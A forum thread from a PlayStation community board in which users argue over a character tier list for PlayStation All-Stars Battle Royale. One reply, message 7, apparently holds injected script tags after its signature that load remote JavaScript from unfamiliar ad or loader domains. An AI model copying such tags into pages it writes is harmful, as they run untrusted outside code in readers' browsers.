PS all star tier list

[ Edited ]
17 replies 840 views Edited Feb 22, 2013

S tier = Raiden

A tier= Kratos Cole Evil cole Emmet Rachett Radec Sir dan Kat

B tier= Fat princess Jak and daxter Sackboy Nariko

C= Spike Dante

D- = Heihachi ) :

My reasons for the tier list. The reason why Raiden is the best is because he dishes far too much damage in the battlefield his supers and moves are ALL versitile.

Sir dan is in A tier because he has a good LV2 an easy semi kill confirm LV1 and a dash attack he is.. Mini raiden

Kratos is more of a fun character to use evn though he is terrible in 1V1 his crowd controll is superb His LV1 is alright his Level 2 is good and his LV3 is great and when a charcters LV3 is the only good super then thats kinda bad.

Heihachi is too akward and performs alright combos but he is slow and close combat really damages him.

And Dante my reason is pb_mal

Message 1 of 18 (840 Views)
Highlighted
Wastelander
616 posts

Re: PS all star tier list

Feb 22, 2013

You dont even have everyone.

Message 2 of 18 (829 Views)
0 Likes
Uncharted Territory
1418 posts

Feb 22, 2013

Sorry  I ain't too good with tier lists my freind

Message 3 of 18 (814 Views)
0 Likes
Hekseville Citizen
325 posts

Feb 22, 2013
I can see... FP should be a possibly s, along with kratos. But meh, its your opinion and i commend you for sharing it, despite what others think.
Message 4 of 18 (791 Views)
Monster Hunter
31 posts

Feb 22, 2013
Raiden is actually quite bad in a controlled environment and belongs in A tier at best.

Radec is absolutely horrible and belongs in C tier or lower.

Emmett is good but not "A tier" good, high B at best. His level 1 and 2 supers are mostly wild cards on a stage without invisible walls.

Daniel has absolutely awful supers and should only make it to C tier on a good day. I also don't know what you're talking about, his level 2 is the worst in the game.

The only thing wrong with Heihachi is his lack of decent kill confirms for level 1, he belongs in at least B tier. I'm a firm believer that he has the easiest AP bursts in the game, other than perhaps Raiden.
Message 5 of 18 (775 Views)
0 Likes
Uncharted Territory
1418 posts

Feb 22, 2013

Sir dan is a beast if used well trust me Radec can spam with a sniper and get easy supers heihachi is only good on a 1v1 situation and Raiden kills all.

Message 6 of 18 (749 Views)
0 Likes
Gaming Beast
2167 posts

Feb 22, 2013
What mode is this for? I mean it looks crazy wrong regardless, but the mode would help.

Also Boom, you can escape literally every super set up (AND FOR SOME REASON EVEN THE KC COMBOS) Dan has if you know how to. Also, his level 3 glitch is still here so it will NEVER kill someone who knows how to escape it.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 7 of 18 (731 Views)
0 Likes
Uncharted Territory
1418 posts

Feb 23, 2013

This fourm dont deaserve 120 views look for something else sorry bout this

Message 8 of 18 (692 Views)
0 Likes
First Son
3 posts

Feb 23, 2013
No raiden is definitely S. Just side square = kill confirm... How is that NOT a S in a game where the score depends on kills? You must be a raiden user..
Message 9 of 18 (663 Views)
0 Likes
Monster Hunter
31 posts

Feb 23, 2013

ShockingWins wrote:
No raiden is definitely S. Just side square = kill confirm... How is that NOT a S in a game where the score depends on kills? You must be a raiden user..

Raiden doesn't have grab confirms, or even grab combos. It's completely safe to block against him, knock him away, and then keep him at a safe distance. The best he can do is his guard break, but that has a small windup which you can easily dodge.

His level 1 has a plethora of confirms on top of an initially wide range, but you can avoid any chance of getting hit by staying mobile and jumping frequently. It's extremely obvious when he will charge, due to him having no projectiles; you can control him without much effort as any character.

His level 2 is decent if you actually get caught in the initial blast, but otherwise will only net 1-2 kills at best. I've never seen his level 3 get more than 4 kills.

And as for your observation, I don't play Raiden. I spend most of my time playing Heihachi and Emmett. The only thing Raiden has going for him is a set of easy combos that can be initiated without much effort on people that aren't paying attention to him. Which is why he usually dominates FFAs.

Message 10 of 18 (637 Views)
0 Likes